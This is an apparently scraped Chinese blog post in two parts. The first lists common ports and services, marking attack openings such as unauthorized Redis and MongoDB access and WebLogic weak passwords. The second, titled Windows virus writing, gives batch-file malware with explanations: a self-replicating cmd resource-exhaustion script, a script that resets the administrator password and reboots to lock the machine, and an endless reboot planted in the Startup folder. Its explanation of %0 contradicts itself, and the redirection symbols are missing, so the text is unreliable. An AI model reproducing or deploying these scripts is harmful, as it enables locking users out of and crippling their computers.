永仁县建设工程信息网站,wordpress 禁止百度转码,嘉兴做网站优化多少钱,注册建筑公司目录
一、常见端口和服务
二、Windows病毒编写 声明#xff1a;学习视频来自b站up主 泷羽sec#xff0c;如涉及侵权马上删除文章
声明#xff1a;本文主要用作技术分享#xff0c;所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判…目录
一、常见端口和服务
二、Windows病毒编写 声明学习视频来自b站up主 泷羽sec如涉及侵权马上删除文章
声明本文主要用作技术分享所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险并遵循相关法律法规。
一、常见端口和服务
21FTP 用于上传、下载文件。
22SSH 用于通过命令行模式远程连接Linux服务器或vps。
23Telnet 用于Telnet远程登录服务器。
25SMTP 用于发送邮件。
80HTTP 用于HTTP服务提供访问功能例如IIS、Apache、Nginx 等服务。
80-89端口可能是web有的web服务不放在80端口而是放在80-89中的一个端口
110POP3 用于POP3 协议POP3 是电子邮件收发的协议。
143IMAP 用于IMAPInternet Message Access Protocol协议IMAP 是用于电子邮件的接收的协议。
443HTTPS 用于HTTPS服务提供访问功能。HTTPS 是一种能提供加密和通过安全端口传输的一种协
议。 (SSL心脏滴血漏洞)
445 SMB
1433SQL Server SQL Server的TCP 端口用于供SQL Server对外提供服务。
1434SQL Server SQL Server的UDP端口用于返回SQL Server使用了哪个 TCP/IP 端口。
1521Oracle通信端口服务器上部署了Oracle SQL需要放行的端口。
2082/2083 cpanel 主机管理系统登录国外用的比较多
2222 da虚拟主机管理系统登录国外较多
3128 squid代理默认端口实现内网漫游
3306MySQL数据库对外提供服务的端口。
3312/3311 kangle主机管理系统登录
3389远程桌面服务端口可以通过这个端口远程连接服务器。
5432 postgreSQL一个关系型数据库
5900 VNC 链接设备VNC未授权访问
6379 redis (存在未授权)
7001、7002 weblogic (默认弱口令反序列化)
7778 kioxo主机控制面板登录
8080/8089/9090 jboss
8080代理端口,同80端口一样8080 端口常用于WWW代理服务实现网页浏览。
8083 vestacp主机管理系统登录
8649 ganglia
8888 宝塔 主机管理系统
10000 virtuamin/webmin 服务器虚拟主机管理系统
11211 memcache 未授权访问
27017、27018 mongodb (未授权访问)
28017 mongodb 统计系统页面
二、Windows病毒编写
资源耗尽病毒原理
echo start cmd 1.txt 将启动cmd的命令写入1.txt
echo %01.txt 无限启动文件命令写入1.txt
ren 1.txt 1.bat 将1.txt文件重命名成脚本文件1.bat
代码解析 echo start cmd 1.txt这条命令的作用是在当前目录下创建一个名为1.txt的文本文件并向其中写入字符串“start cmd”。这里的start是Windows命令行中的一个命令用于启动一个程序或命令行工具cmd是指命令提示符即Windows的命令行界面。 echo %0 1.txt这条命令的作用是将当前批处理脚本的名称%0是一个特殊的变量它代表当前批处理脚本的名称追加到1.txt文件的末尾。这样每次执行这个批处理脚本时它都会将自己追加到文件中形成一个无限循环。 ren 1.txt 1.bat这条命令的作用是将1.txt文件重命名为1.bat。在Windows中.bat文件是批处理脚本文件的扩展名这样重命名后原来的文本文件就变成了一个可执行的批处理脚本。
详解 echo start cmd 1.txt echo 是一个在命令行中显示文本的命令。 start cmd 是要显示的文本start 命令用于启动一个程序或命令行进程这里它将启动一个新的命令行窗口并运行 cmd即命令提示符。 是一个重定向操作符它将 echo 命令的输出从标准输出通常是屏幕重定向到一个文件。 1.txt 是要创建的文件名 操作符会创建这个文件如果文件已存在则会覆盖它。 echo %0 1.txt %0 是一个环境变量它代表当前批处理文件的名称。 是一个追加重定向操作符它会将输出追加到文件的末尾而不是覆盖文件。 这行命令的效果是将当前批处理文件的名称追加到 1.txt 文件中。由于 %0 包含文件的扩展名在这个例子中是 .bat所以这实际上是将 1.bat 这个名称追加到了文件中。 ren 1.txt 1.bat ren 是一个命令用于重命名文件。 1.txt 是要被重命名的原始文件名。 1.bat 是新的文件名将 .txt 扩展名更改为 .bat这样文件就变成了一个批处理文件。
将这些命令组合起来这段代码的执行流程如下 首先创建一个名为 1.txt 的文件并写入 start cmd 命令。 然后将当前批处理文件的名称1.bat追加到 1.txt 文件中。 最后将 1.txt 文件重命名为 1.bat。
当 1.bat 被执行时它会启动一个新的命令行窗口并且由于 %0 指向自身1.bat它会不断地追加自身到文件中形成一个无限循环。每次执行 1.bat 时都会启动一个新的命令行窗口并且由于无限循环的自我引用会导致越来越多的 cmd 窗口被打开最终耗尽系统资源可能导致系统变慢甚至崩溃。
注
这段描述中有一点需要澄清在原始代码中%0 代表的是当前批处理脚本的名称如果当前脚本的扩展名是 .bat那么 %0 会包含这个扩展名。但是在这个特定的例子中当执行 echo %0 1.txt 命令时%0 实际上不会包含 .bat 扩展名因为 %0 只包含脚本的名称不包含路径和扩展名。 %0 是一个特殊的变量它代表当前正在执行的批处理文件的名称。如果当前批处理文件是 1.bat那么 %0 就是 1.bat。 echo %0 1.txt 这条命令的作用是将 %0 的值即当前批处理文件的名称追加到 1.txt 文件的末尾。这里的 是一个追加重定向操作符它将命令的输出追加到指定的文件末尾而不是覆盖文件内容。 由于 %0 变量包含了批处理文件的完整名称在这个例子中是 1.bat所以这条命令实际上是将 1.bat 这个字符串追加到了 1.txt 文件中。
因此这段代码的意思是将当前批处理文件的名称包括扩展名追加到 1.txt 文件中。这样每次执行这个批处理脚本时它都会将自己追加到 1.txt 文件中形成一个无限循环。这会导致 1.txt 文件中包含多个 1.bat 字符串每个字符串代表一次脚本执行时的自我引用。
自动锁机病毒原理
echo net user administrator 123456 c:\windows\Temp\1.bat 修改管理员密码为123456并写入1.bat文件
echo shutdown /r /t 0 c:\windows\Temp\1.bat 将立刻关机命令写入1.bat文件运行后直接修改管理员密码并锁机
代码解析 echo net user administrator 123456 c:\windows\Temp\1.bat echo 是一个命令用于在命令行上显示文本或将文本发送到文件。 net user administrator 123456 是一个用于修改用户账户密码的命令。这里它将本地管理员账户通常用户名为 administrator的密码更改为 123456。 是一个重定向操作符它将 echo 命令的输出从标准输出屏幕重定向到一个文件。在这里它创建或覆盖 c:\windows\Temp\1.bat 文件并写入 net user administrator 123456 命令。 结果是在 C:\Windows\Temp 目录下创建了一个名为 1.bat 的批处理文件其中包含修改管理员密码的命令。 echo shutdown /r /t 0 c:\windows\Temp\1.bat shutdown /r /t 0 是一个命令用于立即重启计算机。/r 参数表示重启/t 0 表示设置延迟时间为0秒。 是一个追加重定向操作符它将 echo 命令的输出追加到已存在的文件末尾。在这里它将 shutdown /r /t 0 命令追加到 c:\windows\Temp\1.bat 文件中。 结果是1.bat 文件现在包含了两个命令修改管理员密码的命令和立即重启计算机的命令。
当 1.bat 被执行时它会 首先尝试将管理员账户的密码更改为 123456。 然后立即重启计算机没有任何延迟。
无限重启病毒原理
echo shutdown /r /t 0 1.bat
copy 1.bat C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
代码解析 echo shutdown /r /t 0 1.bat echo 命令用于在命令行中显示文本或将文本输出到文件。 shutdown /r /t 0 是一个命令用于立即重启计算机。/r 参数表示重启/t 0 表示设置延迟时间为0秒。 是一个重定向操作符它将 echo 命令的输出从标准输出屏幕重定向到一个文件。在这里它创建或覆盖当前目录下名为 1.bat 的文件并写入 shutdown /r /t 0 命令。 结果是在当前目录下创建了一个名为 1.bat 的批处理文件其中包含立即重启计算机的命令。 copy 1.bat C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp copy 是一个命令用于复制文件或目录树。 1.bat 是要复制的源文件即上一步创建的包含重启命令的批处理文件。 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 是目标目录这是Windows系统中的一个特殊目录用于存储在计算机启动时自动运行的程序的快捷方式或批处理文件。 结果是1.bat 文件被复制到 StartUp 目录中这意味着每次计算机启动时1.bat 中的命令即立即重启计算机将被执行。
注
(开机自启动目录)%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup
(重启自动清空缓存)C:\Windows\Temp\1.bat
